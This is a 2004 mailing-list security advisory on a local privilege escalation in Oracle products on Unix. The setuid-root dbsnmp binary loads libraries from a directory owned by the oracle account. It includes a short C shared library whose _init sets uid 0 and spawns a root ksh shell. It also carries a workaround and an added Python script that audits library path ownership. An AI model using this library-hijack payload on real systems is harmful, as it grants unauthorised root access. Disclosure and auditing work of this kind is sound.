
List:       full-disclosure
Subject:    [Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix
From:       Juan Manuel Pascual <jmpascual () open3s ! com>
Date:       2004-07-30 9:28:39
Message-ID: 410A14C7.4050709 () open3s ! com

*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------*

* Title:*    Local Vulnerability in Oracle Products. RDBMS, IAs, etc 
           *All Versions*. (10g not tested)
* Date:*     10-05-2004
* Platform:* Tested on Linux, Solaris & HP-UX, but applicable to other platforms.
* Impact:*   Privilege elevation from the Oracle products installation owner
           (usually called oracle or ias) to root.
* Author:*   Juan Manuel Pascual Escriba <mailto:jmpascual@open3s.com>
* Status:*   Vendor contacted; details below.



*INTRODUCTION:*

Oracle Corporation (nasdaqNM - ORCL) is a world-leading database software developer
that claims to develop unbreakable software. Its products target the database,
application server and data mining markets.


*PROBLEM SUMMARY:*

The following software versions
	- Oracle 8i Linux Platform
	- Oracle 9i Linux Platform
	- Oracle 8i HP-UX Platform
	- Oracle 9i Solaris Platform
	- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
	- All versions tested on Unix platforms (universal?)

are susceptible to privilege elevation from the Oracle software owner (normally oracle, ias,
iasr2) to root.


*DESCRIPTION*

In a default installation of the products listed above, the Oracle libraries are installed
owned by the oracle account.

[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 lbs
drwxr-xr-x  15 iasr2    dba          512 Jan  7 12:13 ldap
drwxr-xr-x   3 iasr2    dba        12800 Nov 21 11:22 lib
drwxr-xr-x  13 iasr2    dba          512 Nov 21 14:04 network
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 ocommon
...

As you can see, the owner of the lib directory is iasr2. Let's look for some setuid binaries:

[pask@dimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo

[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s---   1 root     dba      2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s---   1 root     dba        12632 Nov 21 14:04 ./bin/nmo

Now let's look at the shared objects these binaries depend on.

[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
        libvppdc.so =>   /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 =>      /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so =>    /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 =>        /usr/lib/libthread.so.1
        libkstat.so.1 =>         /usr/lib/libkstat.so.1
	....

[iasr2@dimoniet ora9ias_mid]$  ldd ./bin/nmo
        libnsl.so.1 =>   /usr/lib/libnsl.so.1
        libsocket.so.1 =>        /usr/lib/libsocket.so.1
        libgen.so.1 =>   /usr/lib/libgen.so.1
	.....

Oops, it is not possible to achieve root privileges with nmo this way; dbsnmp, however,
loads libraries from the lib directory owned by iasr2.


For the iasr2 user it is very easy to create a shared library, something like:

#include <stdio.h>
#include <string.h>

_init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   setuid(0);
   system("/usr/bin/ksh");
   printf("Saliendo del Init()\n");
}


	
*IMPACT*
	
	The oracle, ias, iasr2 or iasdb users with local access can gain root privileges through
	the Oracle installation.


*EXPLOIT*

	Described above.


*WORKAROUND*

	chown the lib directory and its parent directory to root.


*STATUS*

	Oracle Security Alerts explained in an email sent 26/07/2004 that "Oracle believes that
	only trusted users should have access to the local iasdb user account".

	I have no information about a patch or a solution from Oracle Corp.




--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            jmpascual@open3s.com
Barcelona - Denia - Spain              http://www.open3s.com
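
An audit for the condition described in this advisory, as an added Python example that is not part of the original post: it takes `ldd` output for a setuid binary and reports every library path component (the file and each parent directory up to `/`) that is not owned by root or is group/world writable. The `ldd` lines are those quoted above; the ownership table in `sample_stat` and uid 1001 for iasr2 are constructed. Walking the whole chain goes beyond the two directories named in the workaround, since any non-root-owned component lets its owner replace what lies below it.

```python
import os
import stat
from collections import namedtuple

# ldd lines for ./bin/dbsnmp as quoted in the advisory (subset).
SAMPLE_LDD = """\
        libvppdc.so =>   /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libwtc9.so =>    /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 =>        /usr/lib/libthread.so.1
"""

FakeStat = namedtuple("FakeStat", "st_uid st_mode")
IASR2_UID = 1001  # constructed uid for the iasr2 account (assumption)

def sample_stat(path):
    """Constructed ownership modelled on the advisory's listing: everything
    under /export/home/iasr2 belongs to iasr2, the rest to root."""
    uid = IASR2_UID if path.startswith("/export/home/iasr2") else 0
    return FakeStat(uid, 0o755)

def resolved_libraries(ldd_output):
    """Yield the absolute path on the right of each 'name => path' line."""
    for line in ldd_output.splitlines():
        _, arrow, target = line.partition("=>")
        fields = target.split()
        if arrow and fields and fields[0].startswith("/"):
            yield os.path.normpath(fields[0])

def path_chain(path):
    """The library itself, then every parent directory up to the root."""
    chain = [path]
    while os.path.dirname(path) != path:
        path = os.path.dirname(path)
        chain.append(path)
    return chain

def audit(ldd_output, stat_fn=os.stat):
    """Return (library, component, reason) for each path component that a
    non-root account could rewrite or replace. Pass os.stat on a real host."""
    findings = []
    for lib in resolved_libraries(ldd_output):
        for component in path_chain(lib):
            st = stat_fn(component)
            if st.st_uid != 0:
                findings.append((lib, component, "owner uid %d" % st.st_uid))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((lib, component, "group/world writable"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_LDD, sample_stat):
        print("%s: %s (%s)" % finding)
```

An empty result for every setuid-root binary in the installation is the state to aim for; libraries that are symlinks should also be audited at their resolved target.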



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
